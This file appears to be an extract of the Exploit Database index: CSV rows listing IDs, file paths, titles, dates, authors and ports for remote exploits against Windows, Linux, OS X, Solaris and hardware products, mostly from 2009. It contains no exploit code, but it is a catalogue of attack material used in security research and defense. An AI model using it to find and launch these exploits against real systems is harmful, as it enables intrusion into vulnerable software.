+8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows, +8295,exploits/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,remote,windows,22 +8316,exploits/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,remote,hardware, +8321,exploits/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow",2009-03-30,Encrypt3d.M!nd,remote,windows, +8332,exploits/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,remote,windows, +8336,exploits/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",remote,windows, +8338,exploits/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Remote Buffer Overflow",2009-04-01,n00b,remote,windows,80 +8339,exploits/windows/remote/8339.py,"XBMC 8.10 - 'takescreenshot' Remote Buffer Overflow",2009-04-01,n00b,remote,windows,80 +8340,exploits/windows/remote/8340.py,"XBMC 8.10 - Get Tag From File Name Remote Buffer Overflow",2009-04-01,n00b,remote,windows,80 +8354,exploits/windows/remote/8354.py,"XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,remote,windows,80 +8359,exploits/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm",2009-04-06,j0rgan,remote,hardware, +8363,exploits/windows/remote/8363.py,"XBMC 8.10 - 'HEAD' Remote Buffer Overflow (SEH)",2009-04-07,His0k4,remote,windows,80 +8368,exploits/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",remote,windows, +8384,exploits/linux/remote/8384.txt,"net2ftp 0.97 - Cross-Site Scripting / Request Forgery",2009-04-09,cicatriz,remote,linux, +8392,exploits/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-Server - Directory Traversal",2009-04-10,DSecRG,remote,windows, +8398,exploits/windows/remote/8398.php,"FTPDMIN 0.96 (Windows XP SP3) - 'RNFR' Remote Buffer Overflow",2009-04-13,surfista,remote,windows,21 +8419,exploits/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure",2009-04-13,Stack,remote,windows,21 +8421,exploits/windows/remote/8421.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,remote,windows,8000 +8422,exploits/windows/remote/8422.py,"Steamcast - HTTP Request Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,remote,windows,8000 +8428,exploits/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - WebServer Directory Traversal",2009-04-14,e.wiZz!,remote,windows, +8458,exploits/multiple/remote/8458.txt,"Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,remote,multiple, +8463,exploits/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,remote,windows, +8518,exploits/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure",2009-04-22,Stack,remote,windows, +8525,exploits/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,remote,windows, +8537,exploits/windows/remote/8537.txt,"dwebpro 6.8.26 - Directory Traversal / File Disclosure",2009-04-27,"Alfons Luja",remote,windows, +8554,exploits/windows/remote/8554.py,"Belkin Bulldog Plus - HTTP Server Remote Buffer Overflow",2009-04-27,His0k4,remote,windows,80 +8556,exploits/linux/remote/8556.c,"Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow",2009-04-28,sgrakkyu,remote,linux, +8560,exploits/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution",2009-04-28,Elazar,remote,windows, +8561,exploits/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure",2009-04-28,Cyber-Zone,remote,windows, +8562,exploits/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow",2009-04-29,Nine:Situations:Group,remote,windows, +8564,exploits/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure",2009-04-29,ZoRLu,remote,windows, +8569,exploits/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - 'GetAnnots()' Remote Code Execution",2009-04-29,Arr1val,remote,linux, +8570,exploits/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - 'customDictionaryOpen()' Code Execution",2009-04-29,Arr1val,remote,linux, +8579,exploits/windows/remote/8579.html,"BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow",2009-04-30,MITBOY,remote,windows, +8613,exploits/win_x86/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,remote,win_x86, +8614,exploits/win_x86/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,remote,win_x86, +8621,exploits/win_x86/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,remote,win_x86, +8623,exploits/win_x86/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,remote,win_x86, +8651,exploits/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,remote,windows, +8666,exploits/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",remote,windows, +8696,exploits/hardware/remote/8696.txt,"D-Link - Captcha Bypass",2009-05-15,"SourceSec Dev Team",remote,hardware, +8704,exploits/windows/remote/8704.txt,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)",2009-05-15,kingcope,remote,windows, +8716,exploits/windows/remote/8716.py,"httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH)",2009-05-18,His0k4,remote,windows,21 +8732,exploits/windows/remote/8732.py,"httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)",2009-05-19,His0k4,remote,windows,21 +8733,exploits/windows/remote/8733.html,"AOL IWinAmpActiveX Class - 'ConvertFile()' Remote Buffer Overflow",2009-05-19,rgod,remote,windows, +8742,exploits/windows/remote/8742.txt,"KingSoft Web Shield 1.1.0.62 - Cross-Site Scripting / Code Execution",2009-05-19,inking,remote,windows, +8753,exploits/osx/remote/8753.txt,"Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2)",2009-05-20,"Landon Fuller",remote,osx, +8754,exploits/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",remote,windows, +8757,exploits/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows, +8758,exploits/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows, +8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,remote,windows, +8786,exploits/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,remote,multiple, +8804,exploits/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,remote,windows,2242 +8806,exploits/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,remote,windows, +8824,exploits/windows/remote/8824.html,"Roxio CinePlayer 3.2 - 'SonicMediaPlayer.dll' Remote Buffer Overflow",2009-05-29,snakespc,remote,windows, +8835,exploits/windows/remote/8835.html,"Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow HeapSpray",2009-06-01,His0k4,remote,windows, +8846,exploits/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,remote,hardware, +8861,exploits/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",remote,osx, +8880,exploits/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,remote,linux, +8897,exploits/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files",2009-06-08,"Jonathan Salwan",remote,windows, +8907,exploits/multiple/remote/8907.txt,"Apple Safari 3.2.x - 'XXE' Local File Theft",2009-06-09,"Chris Evans",remote,multiple, +8916,exploits/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - Control Server Remote Buffer Overflow",2009-06-09,His0k4,remote,windows,80 +8922,exploits/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",remote,windows, +8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows, +8934,exploits/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,remote,windows, +8938,exploits/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],remote,windows, +8963,exploits/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware, +8969,exploits/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,remote,windows, +8970,exploits/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,remote,windows, +8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,remote,windows, +9002,exploits/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM",2009-06-22,mu-b,remote,windows,19810 +9031,exploits/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)",2009-06-29,His0k4,remote,windows,19810 +9039,exploits/multiple/remote/9039.txt,"cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple, +9065,exploits/windows/remote/9065.c,"Green Dam - Remote Change System Time",2009-07-01,"Anti GD",remote,windows, +9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,remote,hardware, +9093,exploits/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,remote,windows, +9096,exploits/windows/remote/9096.txt,"Sun One WebServer 6.1 - .JSP Source Viewing",2009-07-09,kingcope,remote,windows, +9106,exploits/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",remote,windows, +9108,exploits/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",remote,windows, +9117,exploits/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",remote,hardware, +9128,exploits/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,remote,windows, +9137,exploits/windows/remote/9137.html,"Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow",2009-07-13,Sberry,remote,windows, +9143,exploits/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",remote,linux, +9181,exploits/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1)",2009-07-17,"David Kennedy (ReL1K)",remote,windows, +9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware, +9214,exploits/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)",2009-07-20,netsoul,remote,windows, +9224,exploits/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow",2009-07-21,"Ahmed Obied",remote,windows, +9247,exploits/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow",2009-07-24,Dr_IDE,remote,osx, +9278,exploits/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,remote,freebsd, +9303,exploits/windows/remote/9303.c,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",remote,windows, +9318,exploits/windows/remote/9318.py,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow",2009-07-31,His0k4,remote,windows, +9319,exploits/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow",2009-08-01,Bruk0ut,remote,windows,30000 +9330,exploits/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,remote,windows, +9422,exploits/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,remote,hardware, +9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",remote,hardware, +9443,exploits/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' Authenticated Directory Traversal",2009-08-18,DSecRG,remote,windows, +9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,remote,hardware, +9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,remote,windows,69 +9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware, +9498,exploits/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware, +9500,exploits/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,remote,windows, +9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware, +9508,exploits/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,remote,windows, +9541,exploits/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow",2009-08-31,kingcope,remote,windows,21 +9559,exploits/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow",2009-09-01,muts,remote,windows,21 +9586,exploits/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow",2009-09-03,blake,remote,windows,389 +9592,exploits/windows/remote/9592.rb,"SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)",2009-09-04,His0k4,remote,windows,389 +9596,exploits/windows/remote/9596.py,"SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)",2009-09-09,SkuLL-HackeR,remote,windows,389 +9613,exploits/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow (Universal)",2009-09-09,His0k4,remote,windows, +9615,exploits/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution",2009-09-09,"Pierre Nogues",remote,windows, +9638,exploits/windows/remote/9638.txt,"Kolibri+ Web Server 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,remote,windows, +9643,exploits/windows/remote/9643.txt,"kolibri+ Web Server 2 - Directory Traversal",2009-09-11,"Usman Saeed",remote,windows, +9644,exploits/windows/remote/9644.py,"Kolibri+ Web Server 2 - GET Remote Overwrite (SEH)",2009-09-11,blake,remote,windows,80 +9649,exploits/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,remote,windows, +9650,exploits/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,remote,windows, +9651,exploits/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",remote,multiple, +9652,exploits/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection",2009-09-14,ikki,remote,windows,80 +9658,exploits/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",remote,hardware, +9660,exploits/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",remote,windows, +9662,exploits/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,remote,windows,143 +9663,exploits/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,remote,windows, +9673,exploits/windows/remote/9673.py,"BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)",2009-09-15,blake,remote,windows,6660 +9676,exploits/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",remote,windows, +9690,exploits/windows/remote/9690.py,"BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,remote,windows,6660 +9694,exploits/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,remote,windows, +9704,exploits/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",remote,windows, +9705,exploits/windows/remote/9705.html,"Quiksoft EasyMail 6 - 'AddAttachment' Remote Buffer Overflow",2009-09-17,bmgsec,remote,windows, +9718,exploits/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal",2009-09-18,Stack,remote,multiple, +9800,exploits/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",remote,windows,80 +9802,exploits/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - 'iim://' URI handler",2009-09-29,bruiser,remote,windows, +9803,exploits/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow",2009-09-29,pyrokinesis,remote,windows, +9805,exploits/windows/remote/9805.html,"Oracle - Document Capture BlackIce DEVMODE",2009-09-29,pyrokinesis,remote,windows, +9810,exploits/windows/remote/9810.txt,"EnjoySAP 6.4/7.1 - File Overwrite",2009-09-28,sh2kerr,remote,windows, +9813,exploits/windows/remote/9813.txt,"Mereo Web Server 1.8 - Source Code Disclosure",2009-09-25,Dr_IDE,remote,windows,80 +9816,exploits/windows/remote/9816.py,"VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)",2009-09-25,Dr_IDE,remote,windows, +9829,exploits/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,remote,multiple,80 +9843,exploits/multiple/remote/9843.txt,"Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection",2009-11-05,"Core Security",remote,multiple, +9851,exploits/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - '.m3u' Remote Buffer Overflow (1)",2009-11-03,corelanc0d3r,remote,windows, +9853,exploits/windows/remote/9853.rb,"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",remote,windows, +9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022 +9862,exploits/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",remote,hardware, +9886,exploits/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",remote,windows, +9893,exploits/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)",2009-10-15,Skylined,remote,windows,80 +9896,exploits/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80 +9900,exploits/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,remote,windows, +9902,exploits/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Remote Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",remote,windows,80 +9905,exploits/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",remote,windows,1521 +9913,exploits/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,remote,multiple,25 +9914,exploits/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,remote,unix,783 +9915,exploits/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",remote,multiple,3632 +9917,exploits/solaris/remote/9917.rb,"Solaris TelnetD - 'TTYPROMPT' Remote Buffer Overflow (1) (Metasploit)",2002-01-18,MC,remote,solaris,23 +9918,exploits/solaris/remote/9918.rb,"Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,remote,solaris,23 +9920,exploits/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Remote Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",remote,solaris,111 +9921,exploits/solaris/remote/9921.rb,"Solaris 8.0 LPD - Command Execution (Metasploit)",2001-08-31,"H D Moore",remote,solaris,515 +9923,exploits/solaris/remote/9923.rb,"Solaris 8 dtspcd - Remote Heap Overflow (Metasploit)",2002-06-10,noir,remote,solaris,6112 +9924,exploits/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",remote,osx,139 +9925,exploits/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,Metasploit,remote,osx, +9927,exploits/osx/remote/9927.rb,"mDNSResponder 10.4.0/10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,Metasploit,remote,osx, +9928,exploits/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,remote,osx,21 +9929,exploits/osx/remote/9929.rb,"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",remote,osx,25 +9930,exploits/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",remote,osx, +9931,exploits/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",remote,osx,548 +9932,exploits/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,remote,novell, +9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple, +9935,exploits/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,remote,multiple,3690 +9936,exploits/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)",2003-04-07,"H D Moore",remote,linux,139 +9937,exploits/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",remote,multiple, +9939,exploits/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,remote,php, +9940,exploits/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Remote Buffer Overflow (Metasploit)",2001-04-04,patrick,remote,linux,123 +9941,exploits/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution (Metasploit)",2004-10-21,patrick,remote,multiple, +9942,exploits/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",remote,multiple,5555 +9943,exploits/multiple/remote/9943.rb,"Apple QuickTime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",remote,multiple, +9944,exploits/multiple/remote/9944.rb,"Opera 9.50/9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,remote,multiple, +9945,exploits/multiple/remote/9945.rb,"Opera 9.10 - Configuration Overwrite (Metasploit)",2007-03-05,egypt,remote,multiple, +9946,exploits/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)",2006-07-25,"H D Moore",remote,multiple, +9947,exploits/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",remote,windows, +9948,exploits/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization (Metasploit)",2008-12-03,sf,remote,multiple, +9949,exploits/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",remote,multiple, +9950,exploits/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",remote,linux, +9951,exploits/multiple/remote/9951.rb,"Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,remote,multiple,3129 +9952,exploits/linux/remote/9952.rb,"PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,remote,linux,1723 +9953,exploits/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,remote,linux,3306 +9954,exploits/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",remote,linux,3050 +9957,exploits/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - Remote Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",remote,windows, +9966,exploits/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Remote Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",remote,windows,80 +33433,exploits/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX",2014-05-19,metacom,remote,windows, +9992,exploits/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,remote,windows, +9993,exploits/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",remote,multiple, +9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple, +9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple, +9997,exploits/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",remote,multiple, +9998,exploits/windows/remote/9998.c,"BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",remote,windows,21 +10000,exploits/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,remote,hardware, +10001,exploits/multiple/remote/10001.txt,"CUPS - 'kerberos' Cross-Site Scripting",2009-11-11,"Aaron Sigel",remote,multiple,80 +10007,exploits/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",remote,windows, +10011,exploits/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",remote,hardware,80 +10019,exploits/linux/remote/10019.rb,"Borland Interbase 2007/2007 SP2 - 'open_marker_file' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",remote,linux,3050 